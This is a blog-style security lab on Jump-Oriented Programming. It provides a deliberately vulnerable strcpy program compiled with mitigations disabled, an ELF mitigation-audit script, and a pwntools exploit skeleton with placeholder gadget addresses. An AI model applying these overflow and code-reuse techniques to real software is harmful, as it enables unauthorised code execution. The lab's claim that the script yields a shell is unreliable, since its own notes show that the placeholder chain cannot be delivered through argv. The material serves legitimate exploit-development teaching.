strangerRidingCaml

Jump-Oriented Programming (JOP) Lab

System hacking

woddlwoddl 2024. 5. 8. 02:03

In this lab, we will construct JOP chains for code execution. Unlike ROP, which chains gadgets ending in `ret`, JOP chains gadgets that end in an indirect jump (for example `jmp reg`), so the chain is not driven by return addresses popped off the stack.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command. The two flags deliberately disable mitigations: -fno-stack-protector omits the stack canary, and -z execstack marks the stack executable (no NX):

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
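Before moving on, it is worth being able to confirm which mitigations a given binary actually lacks. The script below is an added example, not part of the original lab: it parses the program headers of a little-endian ELF64 file to see whether PT_GNU_STACK carries the executable bit, and uses the presence of the __stack_chk_fail symbol name as a heuristic for the stack canary. build_minimal_elf64 is a constructed stub (not a runnable binary) used only to exercise the checks.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header type that records stack permissions
PF_X = 0x1                  # executable bit in p_flags

def parse_elf64_phdrs(data):
    """Return (p_type, p_flags) for every program header of a little-endian ELF64."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    return [struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
            for i in range(e_phnum)]

def audit_mitigations(data):
    """Report whether the binary keeps the two mitigations the lab's gcc flags remove."""
    gnu_stack = [flags for ptype, flags in parse_elf64_phdrs(data) if ptype == PT_GNU_STACK]
    # -z execstack sets PF_X on PT_GNU_STACK; a missing header is reported as
    # executable here, the conservative reading that checksec-style tools use.
    nx = bool(gnu_stack) and not (gnu_stack[0] & PF_X)
    # Heuristic: -fstack-protector emits calls to __stack_chk_fail, so the name
    # lands in the symbol/string tables; -fno-stack-protector leaves no such trace.
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "canary": canary}

def build_minimal_elf64(stack_flags, with_canary_symbol):
    """Constructed fixture: ELF64 header plus one PT_GNU_STACK header (not runnable)."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr + (b"\x00__stack_chk_fail\x00" if with_canary_symbol else b"")

if __name__ == "__main__":
    # Usage: python audit_mitigations.py ./vulnerable
    with open(sys.argv[1], "rb") as f:
        result = audit_mitigations(f.read())
    for name, present in result.items():
        print(f"{name.upper():7s} {'enabled' if present else 'DISABLED'}")
```

Run against the binary built with the command above, both lines should read DISABLED; rebuilding without the two flags turns both to enabled.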

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to construct the JOP chain, and save it as exploit.py.


  from pwn import *

  # Path to the vulnerable binary built in step 1
  binary_path = './vulnerable'

  # Addresses of JOP gadgets. 0xdeadbeef is a placeholder: replace each one with
  # the address of a gadget found in the binary. In JOP the gadgets end in an
  # indirect jump and are driven by a dispatcher gadget rather than by ret.
  gadget1_addr = 0xdeadbeef  # Example address of gadget 1
  gadget2_addr = 0xdeadbeef  # Example address of gadget 2
  gadget3_addr = 0xdeadbeef  # Example address of gadget 3

  # Offset to the saved return address: 64-byte buffer + 8-byte saved rbp
  offset = 72

  # Construct the JOP chain
  jop_chain = [
      p64(gadget1_addr),  # Gadget 1 address
      p64(gadget2_addr),  # Gadget 2 address
      p64(gadget3_addr),  # Gadget 3 address
      # Add more gadgets as needed
  ]

  # Craft the payload: padding up to the return address, then the chain
  payload = b'A' * offset
  payload += b''.join(jop_chain)

  # Launch the exploit. The program reads its input from argv[1], not stdin,
  # so the payload is passed as the single command-line argument. argv strings
  # are NUL-terminated, so a chain containing 0x00 bytes cannot be delivered this way.
  p = process([binary_path, payload])
  p.interactive()


Explanation of the Python script:

  • We specify the path to the vulnerable binary and the addresses of the JOP gadgets (placeholders in this script).
  • We construct the JOP chain by adding the gadget addresses in the desired order.
  • The payload consists of padding up to the return address followed by the JOP chain.
  • We launch the vulnerable binary with the payload as its single argument, because the program reads argv[1] rather than stdin.
  • p.interactive() hands the process's input and output to us so we can interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful construction of the JOP chain for code execution.
